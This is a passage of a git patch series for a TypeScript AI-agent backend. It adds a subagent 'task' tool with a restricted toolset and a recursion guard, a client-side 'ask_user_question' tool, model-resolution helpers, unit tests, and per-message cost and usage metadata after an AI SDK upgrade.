* - * Currently ships 9 tools: - * - 6 file/shell: bash, read, write, edit, grep, glob - * - todo_write (planning surface; stateless, echoes the list back) + * Currently ships 11 tools: + * + * Sandbox / file ops (6): + * - bash, read, write, edit, grep, glob + * + * Composite (2): + * - task — delegate focused work to a subagent (sub-streamText loop; + * subagent has only read/write/edit/grep/glob/bash to prevent + * recursion via task itself, matching open-agents' subagent + * curation) + * - skill — load a project-level skill's SKILL.md (only registered + * when the sandbox has skills available) + * + * Client-side / planning (3): + * - todo_write (stateless planning surface) * - web_fetch (HTTP via curl inside the sandbox) - * - skill (load a project-level skill's SKILL.md; only registered when the - * sandbox has skills available, so models without any skill catalog - * don't see the tool at all and never call it speculatively) + * - ask_user_question (no server execute; chat UI fulfills it and + * the next workflow turn sees the answer in messages) * * @param options.skills - Discovered skill catalog. When empty / undefined, * `skill` is omitted from the tool record so the model doesn't see it. @@ -36,6 +49,8 @@ export function buildAgentTools(options: { skills?: SkillMetadata[] } = {}) { glob: globTool, todo_write: todoWriteTool, web_fetch: webFetchTool, + task: taskTool, + ask_user_question: askUserQuestionTool, ...(hasSkills ? { skill: skillTool } : {}), }; } diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts index acb455164..7cdcf24a4 100644 --- a/lib/agent/tools/AgentContext.ts +++ b/lib/agent/tools/AgentContext.ts @@ -1,11 +1,20 @@ +import type { LanguageModel } from "ai"; import type { VercelState } from "@/lib/sandbox/vercel/state"; import type { SkillMetadata } from "@/lib/skills/skillTypes"; /** * Per-tool-call context threaded into the agent via `streamText`'s - * `experimental_context`. 
Mirrors the open-agents `AgentContext` shape - * (subset — slim PR 4 ports only the `bash` tool, so context only needs - * what `bash` reads). + * `experimental_context`. Mirrors the open-agents `AgentContext` + * interface (`packages/agent/types.ts`) one-for-one. The only + * deviation is structural: `model` / `subagentModel` are + * `LanguageModel` instances that cannot ride through a durable + * Vercel Workflow input, so `runAgentStep` constructs them per-step + * (via `gateway(input.modelId)`) right before calling `streamText`. + * + * The durable workflow-input shape is `DurableAgentContext` below — + * `runAgentStep` widens that into a full `AgentContext` by attaching + * the constructed model(s) before `experimental_context` is observed + * by any tool. * * Why no `recoupAccessToken` field? A short-lived per-prompt credential * would let sandbox tools (`skill`, the eventual `recoup-api` skill) call @@ -42,4 +51,24 @@ export type AgentContext = { * Empty / undefined when the sandbox has no `skills/` directory. */ skills?: SkillMetadata[]; + /** + * Main agent's language model. Tools read this via `getMainModel`. + * Set per-step by `runAgentStep` (not part of the durable input). + * Mirrors open-agents' `AgentContext.model: LanguageModel`. + */ + model: LanguageModel; + /** + * Optional subagent override. If unset, `getSubagentModel` falls + * back to `model`. Mirrors open-agents' + * `AgentContext.subagentModel?: LanguageModel`. + */ + subagentModel?: LanguageModel; }; + +/** + * The JSON-serializable subset of `AgentContext` that survives a + * Vercel Workflow durable input (`start(runAgentWorkflow, [...])`). + * `LanguageModel` instances aren't serializable, so they're stripped + * here and re-attached inside the step. 
+ */ +export type DurableAgentContext = Omit; diff --git a/lib/agent/tools/__tests__/askUserQuestionTool.test.ts b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts new file mode 100644 index 000000000..ee55e6305 --- /dev/null +++ b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts @@ -0,0 +1,111 @@ +import { describe, it, expect } from "vitest"; +import { + askUserQuestionTool, + askUserQuestionInputSchema, +} from "@/lib/agent/tools/askUserQuestionTool"; + +describe("askUserQuestionInputSchema", () => { + it("accepts a valid single-question payload", () => { + const result = askUserQuestionInputSchema.safeParse({ + questions: [ + { + question: "Which model do you want?", + header: "Model", + options: [ + { label: "Haiku", description: "Fast" }, + { label: "Sonnet", description: "Balanced" }, + ], + multiSelect: false, + }, + ], + }); + expect(result.success).toBe(true); + }); + + it("rejects an empty questions list", () => { + const result = askUserQuestionInputSchema.safeParse({ questions: [] }); + expect(result.success).toBe(false); + }); + + it("rejects more than 4 questions per payload", () => { + const q = { + question: "x?", + header: "h", + options: [ + { label: "a", description: "a" }, + { label: "b", description: "b" }, + ], + multiSelect: false, + }; + const result = askUserQuestionInputSchema.safeParse({ questions: [q, q, q, q, q] }); + expect(result.success).toBe(false); + }); + + it("rejects a question with fewer than 2 options", () => { + const result = askUserQuestionInputSchema.safeParse({ + questions: [ + { + question: "x?", + header: "h", + options: [{ label: "only", description: "one" }], + multiSelect: false, + }, + ], + }); + expect(result.success).toBe(false); + }); + + it("rejects a header longer than 12 chars", () => { + const result = askUserQuestionInputSchema.safeParse({ + questions: [ + { + question: "x?", + header: "this-header-is-way-too-long", + options: [ + { label: "a", description: "a" }, + { label: "b", description: "b" 
}, + ], + multiSelect: false, + }, + ], + }); + expect(result.success).toBe(false); + }); +}); + +describe("askUserQuestionTool — server-side wiring", () => { + it("has no execute (it's a client-side tool the chat UI fulfills)", () => { + expect(askUserQuestionTool.execute).toBeUndefined(); + }); +}); + +describe("askUserQuestionTool.toModelOutput", () => { + it("returns a generic message when no output is present", () => { + expect(askUserQuestionTool.toModelOutput!(undefined as never)).toEqual({ + type: "text", + value: "User did not respond to questions.", + }); + }); + + it("formats `declined: true` as a clear decline message", () => { + const result = askUserQuestionTool.toModelOutput!({ declined: true } as never); + expect(result).toMatchObject({ + type: "text", + value: expect.stringMatching(/declined to answer/i), + }); + }); + + it("formats answered questions as a parseable Q=A summary", () => { + const result = askUserQuestionTool.toModelOutput!({ + answers: { + "Which model do you want?": "Haiku", + "Which features?": ["Streaming", "Tools"], + }, + } as never); + expect(result).toMatchObject({ + type: "text", + value: expect.stringContaining(`"Which model do you want?"="Haiku"`), + }); + expect((result as { value: string }).value).toContain(`"Which features?"="Streaming, Tools"`); + }); +}); diff --git a/lib/agent/tools/__tests__/taskTool.test.ts b/lib/agent/tools/__tests__/taskTool.test.ts new file mode 100644 index 000000000..609037918 --- /dev/null +++ b/lib/agent/tools/__tests__/taskTool.test.ts @@ -0,0 +1,146 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { taskTool } from "@/lib/agent/tools/taskTool"; +import { streamText } from "ai"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("ai", async () => { + const actual = await vi.importActual("ai"); + return { ...actual, streamText: vi.fn() }; +}); + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: 
vi.fn(), +})); + +// `model` is normally attached by `runAgentStep` before the subagent +// sees the context. The opaque sentinel below is enough for taskTool +// to pass it into `streamText` — we assert the same instance flows +// through. +const mainModel = { __sentinel: "main-model" } as never; +const subagentModelOverride = { __sentinel: "subagent-model" } as never; +const ctx = { + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, + model: mainModel, +}; + +function makeStreamTextResult(finalText: string) { + return { + fullStream: (async function* () { + // empty — execute only awaits `result.finishReason` + result.response + })(), + finishReason: Promise.resolve("stop"), + response: Promise.resolve({ + messages: [ + { + role: "assistant", + content: [{ type: "text", text: finalText }], + }, + ], + }), + }; +} + +beforeEach(() => { + vi.clearAllMocks(); + vi.mocked(connectVercel).mockResolvedValue({ workingDirectory: "/sandbox/mono" } as never); +}); + +describe("taskTool.execute", () => { + it("runs a sub-streamText with the subagent system prompt + task + instructions", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamTextResult("Task done.") as never); + const result = (await taskTool.execute!( + { task: "Find the largest .ts file", instructions: "Use glob and stat to find it" }, + { experimental_context: ctx } as never, + )) as { success: boolean; summary: string }; + expect(result.success).toBe(true); + expect(result.summary).toBe("Task done."); + const args = vi.mocked(streamText).mock.calls[0]?.[0] as Record; + // system prompt contains task + instructions so the subagent knows its scope + expect(args.system).toEqual(expect.stringContaining("Find the largest .ts file")); + expect(args.system).toEqual(expect.stringContaining("Use glob and stat")); + }); + + it("registers only the executor tool set (no recursion, no task/ask/skill/todo/fetch)", async () => { + 
vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); + await taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never); + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { tools: Record }; + const toolNames = Object.keys(args.tools).sort(); + expect(toolNames).toEqual(["bash", "edit", "glob", "grep", "read", "write"]); + // Critical: NO task (recursion guard) and NO client-side tools. + expect(args.tools).not.toHaveProperty("task"); + expect(args.tools).not.toHaveProperty("ask_user_question"); + expect(args.tools).not.toHaveProperty("skill"); + expect(args.tools).not.toHaveProperty("todo_write"); + expect(args.tools).not.toHaveProperty("web_fetch"); + }); + + it("passes a non-empty prompt so the model has something to act on", async () => { + // Regression: a previous version called streamText with `messages: []`, + // which caused the AI SDK to throw NoOutputGeneratedError because zero + // steps were recorded — the model had a system prompt but no user turn + // to respond to. The subagent must receive an explicit user-side trigger. 
+ vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); + await taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never); + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { + prompt?: string; + messages?: unknown[]; + }; + const hasPrompt = typeof args.prompt === "string" && args.prompt.length > 0; + const hasMessages = Array.isArray(args.messages) && args.messages.length > 0; + expect(hasPrompt || hasMessages).toBe(true); + }); + + it("inherits the parent's `model` from agent context when no subagentModel override is set", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); + await taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never); + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown }; + expect(args.model).toBe(mainModel); + }); + + it("prefers `subagentModel` over `model` when both are set on the context", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); + await taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: { ...ctx, subagentModel: subagentModelOverride }, + } as never); + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown }; + expect(args.model).toBe(subagentModelOverride); + }); + + it("returns success:false when no assistant text is in the response", async () => { + vi.mocked(streamText).mockReturnValue({ + fullStream: (async function* () {})(), + finishReason: Promise.resolve("stop"), + response: Promise.resolve({ messages: [] }), + } as never); + const result = (await taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never)) as { success: boolean; summary: string }; + expect(result.success).toBe(false); + expect(result.summary).toMatch(/no.*assistant/i); + }); + + it("returns success:false with a descriptive error when streamText 
throws", async () => { + vi.mocked(streamText).mockImplementation(() => { + throw new Error("gateway down"); + }); + const result = (await taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/gateway down/); + }); + + it("throws when agent context is missing the `model` field", async () => { + await expect( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: { sandbox: ctx.sandbox /* no model */ }, + } as never), + ).rejects.toThrow(/model not initialized/i); + }); +}); diff --git a/lib/agent/tools/askUserQuestionTool.ts b/lib/agent/tools/askUserQuestionTool.ts new file mode 100644 index 000000000..8d5e1f4ed --- /dev/null +++ b/lib/agent/tools/askUserQuestionTool.ts @@ -0,0 +1,90 @@ +import { tool, type UIToolInvocation } from "ai"; +import { z } from "zod"; + +const optionSchema = z.object({ + label: z.string().describe("1-5 words, concise choice text"), + description: z.string().describe("Explanation of trade-offs/implications"), +}); + +const questionSchema = z.object({ + question: z.string().describe("The complete question to ask, ends with '?'"), + header: z.string().max(12).describe("Short label for tab/chip display"), + options: z.array(optionSchema).min(2).max(4), + multiSelect: z.boolean().default(false), +}); + +export const askUserQuestionInputSchema = z.object({ + questions: z.array(questionSchema).min(1).max(4), +}); + +export type AskUserQuestionInput = z.infer; + +// Output is filled in by the chat UI after the user answers. 
Either: +// - `{ answers: { [question]: string | string[] } }` — keyed by question text +// - `{ declined: true }` — user dismissed the question component +const answerValueSchema = z.string().or(z.array(z.string())); +const askUserQuestionOutputSchema = z + .object({ answers: z.record(z.string(), answerValueSchema) }) + .or(z.object({ declined: z.literal(true) })); + +export type AskUserQuestionOutput = z.infer; + +/** + * `ask_user_question` — client-side tool for pausing the agent loop to + * collect human input. The model emits a tool-call with the question + * schema; `streamText` halts because there's no server `execute`, the + * chat UI renders the question UI, collects answers, and submits them + * back to the next workflow request as a `tool-output-available` part + * inside `messages`. The next workflow turn picks up where this one + * left off — no WDK pause/resume hook needed. + * + * `toModelOutput` formats the (eventual) user answers into a single + * text block the model can parse on the next turn. + */ +export const askUserQuestionTool = tool({ + description: `Use this tool when you need to ask the user questions during execution. This allows you to: +1. Gather user preferences or requirements +2. Clarify ambiguous instructions +3. Get decisions on implementation choices as you work +4. Offer choices to the user about what direction to take. + +Usage notes: +- Users will always be able to select "Other" to provide custom text input +- Use multiSelect: true to allow multiple answers to be selected for a question +- If you recommend a specific option, make that the first option in the list and add "(Recommended)" at the end of the label +- Questions appear as tabs; users navigate between them before submitting`, + inputSchema: askUserQuestionInputSchema, + outputSchema: askUserQuestionOutputSchema, + // NO execute: this is a client-side tool. streamText halts the run after + // emitting the tool-call; the chat UI fulfills it asynchronously. 
+ toModelOutput: output => { + if (!output) { + return { type: "text", value: "User did not respond to questions." }; + } + + if ("declined" in output && output.declined) { + return { + type: "text", + value: + "User declined to answer questions. You should continue without this information or ask in a different way.", + }; + } + + if ("answers" in output) { + const formatted = Object.entries(output.answers) + .map(([question, answer]) => { + const value = Array.isArray(answer) ? answer.join(", ") : answer; + return `"${question}"="${value}"`; + }) + .join(", "); + return { + type: "text", + value: `User has answered your questions: ${formatted}. You can now continue with the user's answers in mind.`, + }; + } + + return { type: "text", value: "User responded to questions." }; + }, +}); + +export type AskUserQuestionToolUIPart = UIToolInvocation; diff --git a/lib/agent/tools/buildSubagentTools.ts b/lib/agent/tools/buildSubagentTools.ts new file mode 100644 index 000000000..336983252 --- /dev/null +++ b/lib/agent/tools/buildSubagentTools.ts @@ -0,0 +1,32 @@ +import { bashTool } from "@/lib/agent/tools/bashTool"; +import { readFileTool } from "@/lib/agent/tools/readFileTool"; +import { writeFileTool } from "@/lib/agent/tools/writeFileTool"; +import { editFileTool } from "@/lib/agent/tools/editFileTool"; +import { grepTool } from "@/lib/agent/tools/grepTool"; +import { globTool } from "@/lib/agent/tools/globTool"; + +/** + * Subagent tool set — mirrors open-agents' `executor` subagent + * (read/write/edit/grep/glob/bash). Explicitly EXCLUDES the parent + * agent's composite + client-side tools: + * - `task` — recursion guard. Subagents are leaves of the agent + * tree; nesting them would bloat traces, double cost per spawn, + * and risk infinite loops. + * - `ask_user_question` — subagents run autonomously without human + * input. + * - `skill` — subagents execute concrete work; skill loading is the + * parent's job. + * - `todo_write` — the parent does the planning. 
+ * - `web_fetch` — parity with open-agents' executor / explorer / + * design subagents, which all omit it. + */ +export function buildSubagentTools() { + return { + bash: bashTool, + read: readFileTool, + write: writeFileTool, + edit: editFileTool, + grep: grepTool, + glob: globTool, + }; +} diff --git a/lib/agent/tools/getMainModel.ts b/lib/agent/tools/getMainModel.ts new file mode 100644 index 000000000..961a038b5 --- /dev/null +++ b/lib/agent/tools/getMainModel.ts @@ -0,0 +1,26 @@ +import type { LanguageModel } from "ai"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Resolve the main agent's language model from `experimental_context`. + * Mirrors open-agents' `getMainModel` (`tools/utils.ts`). Throws with a + * descriptive error if the context wasn't populated by `runAgentStep`. + * + * @param experimental_context - Opaque context object the AI SDK threads + * into tool execute callbacks. + * @param toolName - Optional tool name for richer error messages. + */ +export function getMainModel(experimental_context: unknown, toolName?: string): LanguageModel { + const context = isAgentContext(experimental_context) ? experimental_context : undefined; + if (!context?.model) { + const toolInfo = toolName ? ` (tool: ${toolName})` : ""; + const contextInfo = context + ? `Context exists but model is missing. Context keys: ${Object.keys(context).join(", ")}` + : "Context is undefined or null"; + throw new Error( + `Model not initialized in context${toolInfo}. ${contextInfo}. ` + + "Ensure runAgentStep sets experimental_context: { model, ... 
}", + ); + } + return context.model; +} diff --git a/lib/agent/tools/getSubagentModel.ts b/lib/agent/tools/getSubagentModel.ts new file mode 100644 index 000000000..07735485e --- /dev/null +++ b/lib/agent/tools/getSubagentModel.ts @@ -0,0 +1,24 @@ +import type { LanguageModel } from "ai"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Resolve the subagent's language model from `experimental_context`, + * falling back to the main agent's model when no dedicated subagent + * model is configured. Mirrors open-agents' `getSubagentModel` + * (`tools/utils.ts`): `ctx.subagentModel ?? ctx.model`. + * + * @param experimental_context - Opaque context object the AI SDK threads + * into tool execute callbacks. + * @param toolName - Optional tool name for richer error messages. + */ +export function getSubagentModel(experimental_context: unknown, toolName?: string): LanguageModel { + const context = isAgentContext(experimental_context) ? experimental_context : undefined; + if (!context?.model) { + const toolInfo = toolName ? ` (tool: ${toolName})` : ""; + throw new Error( + `Model not initialized in context${toolInfo}. ` + + "Ensure runAgentStep sets experimental_context: { model, ... }", + ); + } + return context.subagentModel ?? context.model; +} diff --git a/lib/agent/tools/taskTool.ts b/lib/agent/tools/taskTool.ts new file mode 100644 index 000000000..83381d58f --- /dev/null +++ b/lib/agent/tools/taskTool.ts @@ -0,0 +1,122 @@ +import { streamText, stepCountIs, tool } from "ai"; +import { z } from "zod"; +import { buildSubagentTools } from "@/lib/agent/tools/buildSubagentTools"; +import { getSubagentModel } from "@/lib/agent/tools/getSubagentModel"; + +const SUBAGENT_STEP_LIMIT = 30; + +const taskInputSchema = z.object({ + task: z.string().describe("Short description of the task (displayed to user)"), + instructions: z + .string() + .describe( + [ + "Detailed instructions for the subagent. 
Include:", + "- Goal and deliverables", + "- Step-by-step procedure", + "- Constraints and patterns to follow", + "- How to verify the work", + ].join("\n"), + ), +}); + +const SUBAGENT_SYSTEM_PROMPT = `You are a focused subagent invoked by a parent agent. Run autonomously — do not ask the user clarifying questions. Complete the delegated task using the tools you have, then return a concise summary of what you did. + +Constraints: +- Up to ${SUBAGENT_STEP_LIMIT} tool steps total +- No follow-up questions to the user +- Stay within the scope described in the task; do not pursue tangents +- End with a brief plain-text summary (no markdown headings, no bulleted action list — just what you accomplished)`; + +/** + * `task` — delegate focused, autonomous work to a subagent. The + * subagent runs its own `streamText` loop with a curated tool set, + * isolated from the parent's conversation history, and returns a + * concise summary that the parent can incorporate. + * + * Slim port of open-agents' multi-type SUBAGENT_REGISTRY → single + * generic subagent. Streaming progress isn't piped to the UI (the + * parent sees one long-running tool call until completion); add an + * async-generator execute later if live progress matters. + */ +export const taskTool = tool({ + description: `Launch a subagent to handle complex tasks autonomously. 
+ +WHEN TO USE: +- Clearly-scoped work that can be delegated with explicit instructions +- Work where focused execution would clutter the main conversation +- Multi-step exploration / refactoring that you'd otherwise interleave with other turns + +WHEN NOT TO USE (do it yourself): +- Simple, single-file or single-change edits +- Tasks where you already have all the context you need +- Ambiguous work that requires back-and-forth clarification + +BEHAVIOR: +- The subagent works AUTONOMOUSLY without asking follow-up questions +- It runs up to ${SUBAGENT_STEP_LIMIT} tool steps and then returns +- It returns ONLY a concise summary — internal steps are isolated from the parent + +HOW TO USE: +- Provide a short \`task\` string summarizing the goal (for display) +- Provide detailed \`instructions\` including goals, steps, constraints, and verification criteria + +IMPORTANT: +- Be explicit and concrete — the subagent cannot ask clarifying questions +- Include critical context (APIs, function names, file paths) in the instructions +- The parent agent does not see the subagent's internal tool calls, only its final summary`, + inputSchema: taskInputSchema, + execute: async ({ task, instructions }, { experimental_context, abortSignal }) => { + // Resolves to ctx.subagentModel ?? ctx.model, throwing if context + // wasn't populated by runAgentStep. Mirrors open-agents' task tool + // (`getSubagentModel(experimental_context, "task")`). + const subagentModel = getSubagentModel(experimental_context, "task"); + + try { + // `prompt` (not `messages: []`) is required — the AI SDK records zero + // steps and throws NoOutputGeneratedError if the model has only a + // system prompt with no user turn. Mirrors open-agents' task tool. 
+ const result = streamText({ + model: subagentModel, + system: `${SUBAGENT_SYSTEM_PROMPT}\n\n## Your Task\n${task}\n\n## Instructions\n${instructions}`, + prompt: "Complete this task and provide a summary of what you accomplished.", + tools: buildSubagentTools(), + stopWhen: stepCountIs(SUBAGENT_STEP_LIMIT), + experimental_context, + abortSignal, + }); + + // Drain fullStream so the subagent actually runs to completion. + // Streaming progress back to the parent UI is not wired in this slim + // port — the parent sees one long-running tool call until the + // subagent finishes. + for await (const _part of result.fullStream) { + void _part; + } + + const response = await result.response; + const lastAssistant = response.messages.findLast(m => m.role === "assistant"); + const content = lastAssistant?.content; + + let summary = ""; + if (typeof content === "string") { + summary = content; + } else if (Array.isArray(content)) { + const lastText = content.findLast(p => p.type === "text"); + if (lastText && "text" in lastText) summary = lastText.text; + } + + if (!summary) { + return { + success: false, + summary: "Subagent finished with no assistant text. The task may be incomplete.", + }; + } + + return { success: true, summary }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Subagent failed: ${message}` }; + } + }, +}); From bd67ac7d277fdcc6be77387cfcefe54bf2a666f6 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 18:57:36 -0500 Subject: [PATCH 07/10] feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): emit per-message cost/usage metadata (Bundle C) First step in the open-agents → api cutover sequence. 
Adds a messageMetadata callback to runAgentStep's toUIMessageStream call so the UI receives {modelId, lastStepUsage, totalMessageUsage, lastStepCost, totalMessageCost, stepFinishReasons} on every assistant turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte so sandbox.recoupable.com's model/cost badges keep working when cut over to /api/chat/workflow. New (SRP, one function per file): - lib/agent/messageMetadata/extractGatewayCost.ts — port of open-agents' gateway-metadata.ts, parses gateway-reported per-step cost from providerMetadata. - lib/agent/messageMetadata/addLanguageModelUsage.ts — port of open-agents' usage.ts, pointwise-sums LanguageModelUsage records. - lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring open-agents' WebAgentMessageMetadata. - lib/agent/messageMetadata/buildMessageMetadataCallback.ts — stateful factory returning a fresh callback per turn; accumulates usage + cost across finish-step parts. Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called this out as a known gap from the original workflow port (PR 4). Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean. 
Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage Address PR review feedback (one exported function per file) and adopt the user's preferred path of upgrading api's `ai` package rather than maintaining a normalization shim: - Extract addTokenCounts.ts (used by addLanguageModelUsage) - Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by extractGatewayCost) - Split AgentStepFinishMetadata into its own file (was co-located in AgentMessageMetadata) Upgrade the AI SDK so the wire format matches open-agents natively: - ai: 6.0.0-beta.122 → ^6.0.190 - @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai, @ai-sdk/mcp: all bumped to latest stable The new SDK's LanguageModelUsage is the flat shape (top-level `inputTokens` number + nested `inputTokenDetails`) — identical to open-agents' wire format. No conversion needed, so: - Delete normalizeUsage.ts + test (net -82 LOC) - Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage directly) Production code changes for the SDK upgrade: - runAgentStep + setupChatRequest: await convertToModelMessages (now returns Promise) Tests: 3106/3106 pass; production typecheck clean; lint clean. 
Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- .../workflows/__tests__/runAgentStep.test.ts | 102 ++++++++ app/lib/workflows/runAgentStep.ts | 10 +- .../messageMetadata/AgentMessageMetadata.ts | 29 +++ .../AgentStepFinishMetadata.ts | 11 + .../GatewayProviderMetadata.ts | 18 ++ .../__tests__/addLanguageModelUsage.test.ts | 49 ++++ .../__tests__/addTokenCounts.test.ts | 27 ++ .../buildMessageMetadataCallback.test.ts | 93 +++++++ .../__tests__/extractGatewayCost.test.ts | 28 +++ .../__tests__/hasGatewayShape.test.ts | 25 ++ .../messageMetadata/addLanguageModelUsage.ts | 49 ++++ lib/agent/messageMetadata/addTokenCounts.ts | 13 + .../buildMessageMetadataCallback.ts | 81 ++++++ .../messageMetadata/extractGatewayCost.ts | 20 ++ lib/agent/messageMetadata/hasGatewayShape.ts | 18 ++ lib/chat/setupChatRequest.ts | 10 +- package.json | 12 +- pnpm-lock.yaml | 230 +++++------------- 18 files changed, 648 insertions(+), 177 deletions(-) create mode 100644 app/lib/workflows/__tests__/runAgentStep.test.ts create mode 100644 lib/agent/messageMetadata/AgentMessageMetadata.ts create mode 100644 lib/agent/messageMetadata/AgentStepFinishMetadata.ts create mode 100644 lib/agent/messageMetadata/GatewayProviderMetadata.ts create mode 100644 lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts create mode 100644 lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts create mode 100644 lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts create mode 100644 lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts create mode 100644 lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts create mode 100644 lib/agent/messageMetadata/addLanguageModelUsage.ts create mode 100644 lib/agent/messageMetadata/addTokenCounts.ts create mode 100644 lib/agent/messageMetadata/buildMessageMetadataCallback.ts create mode 100644 lib/agent/messageMetadata/extractGatewayCost.ts create mode 100644 
lib/agent/messageMetadata/hasGatewayShape.ts diff --git a/app/lib/workflows/__tests__/runAgentStep.test.ts b/app/lib/workflows/__tests__/runAgentStep.test.ts new file mode 100644 index 000000000..429a37505 --- /dev/null +++ b/app/lib/workflows/__tests__/runAgentStep.test.ts @@ -0,0 +1,102 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { streamText } from "ai"; +import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; + +vi.mock("ai", async () => { + const actual = await vi.importActual("ai"); + return { ...actual, streamText: vi.fn() }; +}); + +// Avoid pulling in real gateway / fetch surface. +vi.mock("@ai-sdk/gateway", () => ({ + gateway: vi.fn((modelId: string) => ({ modelId, __mock: "gateway" })), +})); + +function makeStreamResult(opts?: { metadataCalls?: Array<unknown> }) { + const calls = opts?.metadataCalls ?? []; + return { + toUIMessageStream: vi.fn((streamOpts: { messageMetadata?: unknown }) => { + // Capture the callback so tests can inspect it + calls.push(streamOpts.messageMetadata); + return (async function* () { + yield { type: "start" }; + yield { type: "finish" }; + })(); + }), + finishReason: Promise.resolve("stop"), + }; +} + +function makeWritable() { + const written: unknown[] = []; + const stream = new WritableStream({ + write(chunk) { + written.push(chunk); + }, + }); + return { stream, written }; +} + +const baseInput = { + messages: [ + { + id: "m1", + role: "user" as const, + parts: [{ type: "text" as const, text: "hi" }], + }, + ], + modelId: "anthropic/claude-haiku-4.5", + agentContext: { + sandbox: { state: { type: "vercel" }, workingDirectory: "/sandbox/mono" }, + }, +}; + +describe("runAgentStep", () => { + beforeEach(() => { + vi.clearAllMocks(); + }); + + it("wires a messageMetadata callback into toUIMessageStream", async () => { + const captured: unknown[] = []; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); + const { stream } = makeWritable(); + + await
runAgentStep({ ...baseInput, writable: stream } as never); + + expect(captured).toHaveLength(1); + expect(typeof captured[0]).toBe("function"); + }); + + it("the wired callback emits modelId on finish-step parts", async () => { + const captured: unknown[] = []; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); + const { stream } = makeWritable(); + + await runAgentStep({ ...baseInput, writable: stream } as never); + + const cb = captured[0] as (args: { + part: { type: string; usage?: unknown; finishReason?: string }; + }) => { modelId?: string } | undefined; + const meta = cb({ + part: { + type: "finish-step", + usage: { inputTokens: 10, outputTokens: 5 }, + finishReason: "stop", + }, + }); + expect(meta).toBeDefined(); + expect(meta?.modelId).toBe("anthropic/claude-haiku-4.5"); + }); + + it("the wired callback returns undefined for non-finish-step parts", async () => { + const captured: unknown[] = []; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); + const { stream } = makeWritable(); + + await runAgentStep({ ...baseInput, writable: stream } as never); + + const cb = captured[0] as (args: { part: { type: string } }) => unknown; + expect(cb({ part: { type: "text-delta" } })).toBeUndefined(); + expect(cb({ part: { type: "start" } })).toBeUndefined(); + }); +}); diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index b487285dc..983bf4d7a 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -4,6 +4,7 @@ import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext"; +import { buildMessageMetadataCallback } from "@/lib/agent/messageMetadata/buildMessageMetadataCallback"; export type 
